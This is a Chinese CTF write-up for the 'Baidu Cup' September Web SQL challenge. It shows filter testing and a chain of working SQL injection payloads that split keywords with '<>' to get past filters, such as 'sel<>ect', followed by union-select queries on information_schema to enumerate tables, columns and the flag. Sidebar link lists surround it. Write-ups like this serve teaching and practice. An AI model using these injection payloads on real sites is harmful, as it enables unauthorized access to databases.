当前位置:网站首页>“百度杯”CTF比赛 九月场,Web:SQL
“百度杯”CTF比赛 九月场,Web:SQL
2022-07-05 13:00:00 【Part 02】
题目内容:
出题人就告诉你这是个注入,有种别走!
看 URL
/index.php?id=1
测过滤
没有过滤: ' 空格 #
被过滤: order by,select
测能否绕过
/**/
1 ord/**/er by 3%23
<>
1 ord<>er by 3%23 有回显
1 ord<>er by 4%23 无回显
?id=-1 union sel<>ect 1,2,3%23

?id=-1 union sel<>ect 1,database(),3%23

?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()%23

?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_schema=database()%23

?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info%23

边栏推荐
- I'm doing open source in Didi
- About the single step debugging of whether SAP ui5 floating footer is displayed or not and the benefits of using SAP ui5
- Introduction to sap ui5 dynamicpage control
- 关于 SAP UI5 floating footer 显示与否的单步调试以及使用 SAP UI5 的收益
- 946. 验证栈序列
- 155. Minimum stack
- Concurrent performance test of SAP Spartacus with JMeter
- 峰会回顾|保旺达-合规和安全双驱动的数据安全整体防护体系
- Lb10s-asemi rectifier bridge lb10s
- PyCharm安装第三方库图解
猜你喜欢

Navigation property and entityset usage in SAP segw transaction code

Shi Zhenzhen's 2021 summary and 2022 outlook | colorful eggs at the end of the article

Didi open source Delta: AI developers can easily train natural language models

开发者,云原生数据库是未来吗?

解决uni-app配置页面、tabBar无效问题

LeetCode20.有效的括号

Introduction to the principle of DNS

Principle and configuration of RSTP protocol

简单上手的页面请求和解析案例

Binder通信过程及ServiceManager创建过程
随机推荐
SAP SEGW 事物码里的 Association 建模方式
leetcode:221. 最大正方形【dp状态转移的精髓】
Concurrent performance test of SAP Spartacus with JMeter
前缀、中缀、后缀表达式「建议收藏」
Principle and performance analysis of lepton lossless compression
A specific example of ABAP type and EDM type mapping in SAP segw transaction code
MySQL splits strings for conditional queries
RHCSA4
Halcon 模板匹配实战代码(一)
Small case of function transfer parameters
事务的基本特性和隔离级别
My colleague didn't understand selenium for half a month, so I figured it out for him in half an hour! Easily showed a wave of operations of climbing Taobao [easy to understand]
蜀天梦图×微言科技丨达梦图数据库朋友圈+1
峰会回顾|保旺达-合规和安全双驱动的数据安全整体防护体系
RHCSA8
C# 对象存储
Changing JS code has no effect
【服务器数据恢复】某品牌服务器存储raid5数据恢复案例
Apicloud studio3 API management and debugging tutorial
Notion 类笔记软件如何选择?Notion 、FlowUs 、Wolai 对比评测